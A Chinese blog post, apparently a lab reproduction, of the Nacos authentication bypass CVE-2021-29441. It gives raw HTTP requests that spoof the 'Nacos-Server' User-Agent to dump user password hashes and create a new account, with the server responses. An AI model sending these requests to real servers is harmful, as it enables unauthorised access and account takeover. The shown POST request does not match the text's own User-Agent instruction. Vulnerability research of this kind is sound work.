Nacos 认证绕过漏洞(CVE-2021-29441)复现

已于 2024-05-07 10:38:22 修改
阅读量619 收藏 4
点赞数 4
文章标签: spring cloud
于 2024-05-07 10:36:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43210943/article/details/138520620
版权

记一次内网Nacos 认证绕过漏洞(CVE-2021-29441)复现

漏洞说明

Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。

该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。并且利用这个未授权漏洞,攻击者可以获取到用户名密码等敏感信息。

参考链接:https://github.com/vulhub/vulhub/blob/master/nacos/CVE-2021-29441/README.zh-cn.md

复现过程

1.1漏洞检测

http://目标地址:8848/nacos/v1/auth/users?pageNo=1&pageSize=2

在访问的时候,将User-Agent的值修改为Nacos-Server,发到repeater模块,看下返回包:

GET /nacos/v1/auth/users?pageNo=1&pageSize=2 HTTP/1.1
Host: 192.168.112.58:8848
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Date: Tue, 07 May 2024 01:33:34 GMT
Connection: close
Content-Length: 159

{"totalCount":1,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"username":"nacos","password":"$2a$10$j1O.6HQN8V63NCT/LNAB0.oyDv3decr.zXzTlJNOuCWHTgvPJkmr6"}]}

注意修改User-Agent

此时看到返回的响应为200,并且包含了当前的用户名nacos,密码为加盐加密之后的值

1.2用户注册

在下面的链接中添加一个新用户:crow,注意使用POST方法,并且需要将User-Agent依旧设置为Nacos-Server

http://目标地址:8848/nacos/v1/auth/users?username=crow&password=crow

POST /nacos/v1/auth/users?username=crow&password=crow HTTP/1.1
Host: 192.168.112.58:8848
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

返回包:

HTTP/1.1 200 
Content-Security-Policy: script-src 'self'
Content-Type: application/json;charset=UTF-8
Date: Tue, 07 May 2024 01:36:15 GMT
Connection: close
Content-Length: 52

{"code":200,"message":null,"data":"create user ok!"}

发包记得修改User-Agent
返回"create user ok!"

在浏览器中访问

http://目标地址:8848/nacos/v1/auth/users?pageNo=1&pageSize=2

证明用户创建成功
此时用户添加成功,使用新建的账号登录:

在这里插入图片描述

Hbmya
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[ vulhub漏洞复现篇 ] 阿里巴巴Nacos身份验证绕过(nacos未授权)(CVE-2021-29441)
qq_51577576的博客
11-27 1293
[ vulhub漏洞复现篇 ] 阿里巴巴Nacos身份验证绕过(nacos未授权)(CVE-2021-29441) 该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。并且利用这个未授权漏洞,攻击者可以获取到用户名密码等敏感信息。
nacos配置中心nacos-server-2.2.3
08-16
总的来说,Nacos-server-2.2.3是为了解决分布式系统中的服务治理和配置管理问题而设计的工具,它集成了Java生态,提供了强大的配置管理和服务发现能力,而且2.2.3版本的发布意味着它已经过了一系列的改进和优化,...
【渗透实战】Nacos未授权访问(CVE-2021-29441
Nafia的博客
02-20 2619
Nacos未授权访问漏洞挖掘记录
Nacos权限绕过漏洞(CVE-2021-29441)复现
最新发布
2301_76437855的博客
04-14 1248
CVE-2021-29441Nacos 组件中的一个权限验证漏洞,该漏洞允许未授权的攻击者绕过认证,进而获取服务器的敏感信息或执行未授权操作。把请求头中GET请求改成POST,User-Agent中的参数换成Nacos-Server,然后我添加了一个用户nbacba,密码一样。我们可以看见有一个叫nacos的用户,密码通过盐加密方法加密(nacos的初始用户名和密码都为nacos,有时候可以碰碰运气)升级 Nacos 到安全版本:Nacos 官方已发布修复此漏洞的版本。返回值为200,可以正常访问。
Nacos未授权访问漏洞CVE-2021-29441复现
一纸荒芜的博客
10-26 2059
Nacos未授权访问漏洞复现
Nacos未授权访问漏洞
00勇士王子的博客
02-27 6261
一般来说,nacos被建议部署在内网中,如果在外网出现,会有很大的风险。
Nacos权限认证绕过漏洞CVE-2021-29441)虚拟机环境下复现
weixin_44656518的博客
08-09 388
nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。利用这个未授权漏洞,攻击者可以获取到用户名密码等敏感信息。
Nacos未授权访问漏洞复现
apple_52661176的博客
07-09 1256
nacos未授权访问漏洞的几种姿势
Nacos安全漏洞修复方案:保护您的应用服务
修己xj的博客
06-16 2489
尊敬的家人们,大家好!在过去的几年中,Nacos作为阿里巴巴推出的一项开源项目,为云原生应用的构建和管理提供了许多便利。然而,最近发现了一个安全漏洞,该漏洞可能导致未经授权的用户获取到敏感信息。为了确保您的应用程序的安全性,我们将在本文中向您介绍修复Nacos漏洞的方案
Nacos身份绕过漏洞(QVD-2023-6271)复现学习
crowsec
03-17 6787
Nacos身份绕过漏洞(QVD-2023-6271)复现学习
NACOS身份认证绕过漏洞批量检测poc.7z
02-24
然而,如同任何复杂的软件系统,NACOS也可能存在安全漏洞,其中之一就是“身份认证绕过漏洞”。 身份认证绕过漏洞通常指的是攻击者可以通过某种方式规避系统的身份验证机制,直接访问或操作本应受保护的资源。在...
nacos-server-loongarch64-2.3.0.tar.gz
12-15
本资源“nacos-server-loongarch64-2.3.0.tar.gz”是专为龙芯CPU平台定制的版本,适应了国产化硬件环境的发展需求,使得在基于龙芯CPU的计算机和服务器上部署和运行Nacos成为可能。 首先,让我们深入了解Nacos。...
最新nacos-server-2.2.0下载
12-29
总结来说,Nacos-server-2.2.0版本作为一款强大的服务治理工具,不仅提供了完善的服务发现和配置管理功能,还在性能、稳定性、用户体验上进行了显著提升,对于Windows用户来说,安装和使用也更为简便。无论是微服务...
nacos-server-2.0.3 nacos-server-2.0.3 nacos-server-2.0.3
04-08
nacos-server-2.0.3
Nacos未授权访问漏洞 修复方法
梵法利亚的博客
12-13 8470
漏洞概述 2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。 影响版本 Nacos <= 2.0.0-ALPHA.1 修复方式 若业务环境允许,使用白名单限制相关web项目的访问来降低风险。 官方已发布最新安全版本,请及时下载升级至安全版本。 ...
CVE-2021-42342漏洞复现及docker环境搭建
axdnoob的博客
07-18 2947
CVE-2021-42342 漏洞复现
Nacos 未授权访问漏洞复现
weixin_58609150的博客
07-08 611
POST http://IP:端口/nacos/v1/auth/users?漏洞地址:GET http://IP:端口/nacos/v1/auth/users?输入任意密码bp抓包修改返回包即可绕过进入后台。抓包将get方式修改为post并重放。
Nacos系统历史CVE漏洞复现分析与检测
道阻且长,行则将至。
02-07 2395
本文复现、分析、总结了 Nacos 近几年的历史 CVE 漏洞,可以看到大厂发布的开源系统并非“坚不可摧”,很多看似“合理”的业务需求会成为漏洞的发源地。作为开发或运维人员,在引入开源组件或系统到自身业务系统的时候,应该持续关注其是否爆出安全漏洞,并及时升级版本、修复漏洞
Nacos漏洞总结复现
热门推荐
渗透测试研究中心
03-23 1万+
Nacos漏洞总结复现一、Nacos默认key导致权限绕过登陆0x00 漏洞描述Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致未授权访问漏洞。 通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户0x01漏洞影响0.1.0 <= Nacos <= 2.2.00x02 漏洞搜索fofa:app="NACOS"0x03 ...
nacos权限绕过漏洞(CVE-2021-29441)
10-26
nacos权限绕过漏洞(CVE-2021-29441)是指在nacos进行认证授权操作时,会判断请求的user-agent是否为"Nacos-Server",如果是的话则不进行任何认证。攻击者可以通过伪造请求头中的user-agent来绕过认证,获取到用户名密码等敏感信息。该漏洞的原因是开发者将协商好的user-agent设置为"Nacos-Server",直接硬编码在了代码里,导致了漏洞的出现。攻击者可以通过发送特定的请求,来添加一个新用户,账号密码都为vulhub,然后使用新建的账号进行登录,从而绕过认证。在漏洞利用过程中,只需要用到nacos的web访问端口8848。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值